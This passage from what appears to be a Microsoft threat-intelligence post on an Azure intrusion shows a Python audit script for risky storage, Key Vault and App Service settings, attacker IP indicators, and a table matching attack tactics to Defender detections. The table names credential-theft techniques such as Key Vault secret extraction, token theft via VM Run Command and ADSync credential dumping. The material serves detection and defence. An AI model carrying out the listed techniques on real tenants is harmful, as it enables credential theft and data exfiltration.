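    for endpoint in ("ftp", "scm"):
        if policies.get(endpoint, {}).get("allow", True):
            findings.append(f"basic publishing credentials allowed for {endpoint} (exposed via publishxml)")
    return findings


CHECKS = {
    "microsoft.storage/storageaccounts": check_storage,
    "microsoft.keyvault/vaults": check_key_vault,
}


def audit(resources: List[Dict]) -> Dict[str, List[str]]:
    # Group publishing-credential policy children by their parent site name.
    policies: Dict[str, Dict[str, Dict]] = {}
    for r in resources:
        if r["type"].lower() == "microsoft.web/sites/basicpublishingcredentialspolicies":
            site, endpoint = r["name"].split("/", 1)
            policies.setdefault(site, {})[endpoint.lower()] = r["properties"]

    report: Dict[str, List[str]] = {}
    for r in resources:
        rtype = r["type"].lower()
        if rtype in CHECKS:
            report[r["name"]] = CHECKS[rtype](r["properties"])
        elif rtype == "microsoft.web/sites":
            report[r["name"]] = check_app_service(r["properties"], policies.get(r["name"], {}))
    return report


# Constructed documents: one weak and one hardened storage account, a vault still on
# access policies with no purge protection, and a site with basic publishing enabled.
SAMPLE_RESOURCES = [
    {"type": "Microsoft.Storage/storageAccounts", "name": "prodfiles",
     "properties": {"publicNetworkAccess": "Enabled",
                    "networkAcls": {"defaultAction": "Allow", "ipRules": [{"value": "203.0.113.10"}]},
                    "allowBlobPublicAccess": True, "allowSharedKeyAccess": True}},
    {"type": "Microsoft.Storage/storageAccounts", "name": "archive",
     "properties": {"publicNetworkAccess": "Disabled", "networkAcls": {"defaultAction": "Deny"},
                    "allowBlobPublicAccess": False, "allowSharedKeyAccess": False}},
    {"type": "Microsoft.KeyVault/vaults", "name": "prod-kv",
     "properties": {"publicNetworkAccess": "Enabled", "networkAcls": {"defaultAction": "Allow"},
                    "enableRbacAuthorization": False}},
    {"type": "Microsoft.Web/sites", "name": "auth-api", "properties": {"publicNetworkAccess": "Enabled"}},
    {"type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "name": "auth-api/ftp", "properties": {"allow": True}},
    {"type": "Microsoft.Web/sites/basicPublishingCredentialsPolicies", "name": "auth-api/scm", "properties": {"allow": True}},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_RESOURCES).items():
        print(name, "->", findings or "ok")
```

Each finding maps to one step the threat actor took: the storage network rule they widened, the account keys they listed, the vault access configuration they changed, and the publishing profile they pulled. Running the same checks as Azure Policy (deny or audit effects on these properties) is what keeps the hardened state from drifting back.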
General hygiene recommendations
Indicators of compromise (IOCs)
IOCs reflect observations at the time of analysis and may not be exhaustive or persistent.
| Indicator | Type | Description |
|---|---|---|
| 176.123.4[.]44 | IP address | Attacker egressed from this address |
| 91.208.197[.]87 | IP address | Attacker egressed from this address |
| 185.241.208[.]243 | IP address | ScreenConnect instance used by the attacker |
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Note that the following detections only cover the threat activities we observed at the time of analysis.
| Tactic | Observed activity | Microsoft Defender coverage |
|---|---|---|
| Initial access | Sign-in activity from attacker infrastructure to compromised identities; sign-in and authentication activity to Azure resources | Microsoft Defender XDR: Authentication with compromised credentials; Compromised user account in a recognized attack pattern; Malicious sign-in from a risky IP address; Malicious sign-in from an IP address associated with recognized attacker infrastructure; Malicious sign-in from recognized attacker infrastructure; Malicious sign-in from an unusual user agent; Malicious sign-in from known threat actor IP address; Successful authentication from a malicious IP; Successful authentication from a suspicious IP; Successful authentication using compromised credentials; User compromised through session cookie hijack; User signed in from a known malicious IP address; Impossible travel. Microsoft Defender for Identity. Microsoft Defender for Cloud: Defender for Databases; Defender for Storage |
| Execution | Various types of execution-related suspicious activity by an attacker were observed | Microsoft Defender XDR: Possibly compromised user ran a malicious script using an Azure VM extension; Potential hybrid ransomware or hands-on-keyboard attack originating from Azure VM extensions; Hybrid ransomware or hands-on-keyboard attack originating from Azure VM extensions; Azure VM extension activity followed by ransomware or hands-on-keyboard attack. Microsoft Defender for Cloud: Defender for Servers P2. Microsoft Defender for Endpoint |
| Persistence | Attacker device registered as MFA method; ScreenConnect installed on Azure VMs | Microsoft Defender for Identity: Suspicious addition of default third-party MFA method to user account; Suspicious Entra device join or registration. Microsoft Defender for Cloud Apps. Microsoft Defender for Endpoint |
| Defense evasion | Attempts to tamper with Microsoft Defender Antivirus; manipulation of Azure Storage account, Key Vault, and SQL database configurations | Microsoft Defender for Endpoint: Attempt to turn off Microsoft Defender Antivirus protection; Attempt to clear event log; Event log was cleared. Microsoft Defender for Cloud: Defender for Key Vault |
| Credential access | Secret extraction from Azure Key Vault; attempted theft of workload identity tokens using Azure VM Run Command; credential harvesting from endpoints through ScreenConnect; retrieval of the Azure App Service web app publishing profile for credential access; listing of Azure storage account access keys for access | Microsoft Defender Antivirus: Trojan:Win32/SuspAdSyncAccess; Backdoor:Win32/AdSyncDump; Behavior:Win32/DumpADConnectCreds; Behavior:Win32/SuspAdsyncBin. Microsoft Defender for Endpoint. Microsoft Defender for Cloud: Defender for Servers P2; Defender for Key Vault |
| Discovery | Domain and device discovery commands run on virtual machines | Microsoft Defender for Endpoint: Suspicious sequence of exploration activities. Microsoft Defender for Cloud Apps |
| Lateral movement | Traversal between cloud resources and applications | Microsoft Defender for Identity: Suspicious sign-in to a web app following MFA phone number tampering activity. Microsoft Defender for Cloud Apps. Microsoft Defender for Cloud |
| Exfiltration | Data exfiltration from Azure Storage accounts and other resources; data exfiltration from file storage services | Microsoft Defender XDR: Suspicious behavior: Mass download. Microsoft Defender for Cloud Apps. Microsoft Defender for Cloud: Defender for Storage |
This research is provided by Microsoft Defender Security Research with contributions from Adi Segal, Karam Abu Hanna, Alon Marom, and members of Microsoft Threat Intelligence.
Learn more
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.